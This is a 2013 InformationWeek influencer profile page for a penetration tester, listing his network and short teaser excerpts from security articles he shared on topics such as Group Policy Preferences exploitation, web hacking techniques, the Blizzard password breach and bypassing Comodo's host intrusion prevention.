InformationWeek: The Business Value of Technology

InformationWeek: The Business Value of Technology
e2 Conference & Expo - Boston 2013

Informationweek Influencer

ChrisJohnRiley ♻

ChrisJohnRiley ♻ (@ChrisJohnRiley)

Twitter Bio:
--== I'm just this guy, you know! ==-- :: Penetration Tester :: Blogger (@catch22insec) :: Podcaster (@eurotrashsec)
Location:
Austria
Website:
http://blog.c22.cc

ChrisJohnRiley ♻'s
Network
SophosLabs attrition.org Virus Bulletin Matt Simmons cedricpernet Chris Ensey novainfosec Rob Lewis adam shostack Nick Selby Bev Robb securitypro2009 MC Petermann Andrew Jaquith Gal Shpantzer Matt Johansen ChrisJohnRiley ♻ Dave Marcus SocialMediaSecurity Jeremiah Grossman BreakingPoint Nicolas Brulez Dave Piscitello Anita Campbell Mariano M. del Río ID Experts grecs SecurityBuzz Joel Libava Panda Security David Chartier Dave Whitelegg Ben Jackson Security4all Gunter Ollmann UBM Tech Electronics Chae Jong Bin Lookout SecurityWeek Brian Pennington eEyeDigitalSecurity Yuri Diogenes CiscoEDU Mikko Hypponen GarWarner Andrew Waite Patrik Runald Dept. of Technology briankrebs DEFCON jcran David Webroot Web Security News Javvad Malik Raf Mark Headd Chris Boyd

ChrisJohnRiley ♻'s Selections From the Web

Exploiting Windows 2008 Group Policy Preferences
Exploiting Windows 2008 Group Policy Preferences

 |2 Influencers

Internal network pentesting involving domain controllers requires a few steps in order to gain domain administrator access. One of them usually requires to gain local administrator access to a workstation. In this article, we show how this can be possible from a limited domain user account when specific Group Policy Preferences (GPP) are deployed. GPP are new Active Directory features introduced in Windows 2008; documenting

Top Ten Web Hacking Techniques of 2012

 |10 Influencers

Every year the security community produces a stunning amount of new Web hacking techniques that are published in various white papers, blog posts, magazine articles, mailing list emails, conference presentations, etc. Within the thousands of pages are the latest ways to attack websites, Web browsers, Web proxies, and their mobile platform equivilents. Beyond individual vulnerabilities with CVE numbers or system compromises, here we are solely focused on new and creative methods of Web-based attack. Now it its seventh year, The Top Ten Web Hacking Techniques list encourages information sharing, provides a centralized knowledge-base, and recognizes

Open For Review: Web Sites That Accept Security Research

 |4 Influencers

So one of the core aspects of my mostly-kidding-but-no-really White Hat Hacker Flowchart is that, if the target is a web page, and it’s not running on your server, you kind of need permission to actively probe for vulnerabilities.

One could make the argument that you can detect who in the marketplace has a crack security team, by who’s willing and able to commit the resources for an open vulnerability review policy.

Some smaller sites have also jumped on board (mostly absorbing and reiterating Salesforce’s policy — cool!):

There’s some interesting implications to all of this,

‘SRP’ Won’t Protect Blizzard’s Stolen Passwords

 |3 Influencers

Blizzard announced today they they have suffered a major data breach, and sensitive user data was stolen from their servers. According to their statement the specific data stolen includes email address, the answer to the personal security question, and information relating to two-factor authentication. They also lost their SRP server-side verifier database, which is the database they use to verify user passwords.

And despite what Blizzard is claiming, I believe the vast majority of their users’ plain text passwords have been exposed as well.

We

Why Usermode Hooking Sucks – Bypassing Comodo Internet Security
Why Usermode Hooking Sucks – Bypassing Comodo Internet Security

 |2 Influencers

This post discusses the issues that arise from the reliance on user-mode control flow monitoring techniques for the implementation of systems such as Host Based Intrusion Detection Systems, Sandboxes, Function Tracers, etc. It focuses on a single HIPS product offered by Comodo [1], a well respected company that helps the community by offering a number of their products free of charge. However, the techniques used by this product are not completely bulletproof and can be exploited by malicious agents to disable

Get InformationWeek Daily

Don't miss each day's hottest technology news, sent directly to your inbox, including occasional breaking news alerts.

Sign up for the InformationWeek Daily email newsletter

*Required field

Privacy Statement



Upcoming Events

This Week's Issue

This Week's Issue
Back Issues
Must Reads &
IT Trends

Current Healthcare Issue

InformationWeek Healthcare - May 2013
Back Issues
Must Reads &
IT Trends
In this issue:
  • Healthcare CIO 20: Innovation is tough amid today's regulatory checklists. These leaders are getting it done.
  • Lessons Learned: Boston area CIO John Halamka reflects on the marathon bombing
  • And much more!
  • Read the Current Issue

Current Education Issue

InformationWeek Education - May 2013
Back Issues
Must Reads &
IT Trends
In this issue:
  • Hacking Higher Ed: The cybersecurity challenge on college campuses lies as much with the students as with malicious outsiders.
  • When Education Gets Too Virtual: Students can use technology to undermine the integrity of education.
  • And much more!
  • Read the Current Issue

Related Whitepapers

 
 
What's this?
More >>

Related Reports

 
 
What's this?
More >>





Video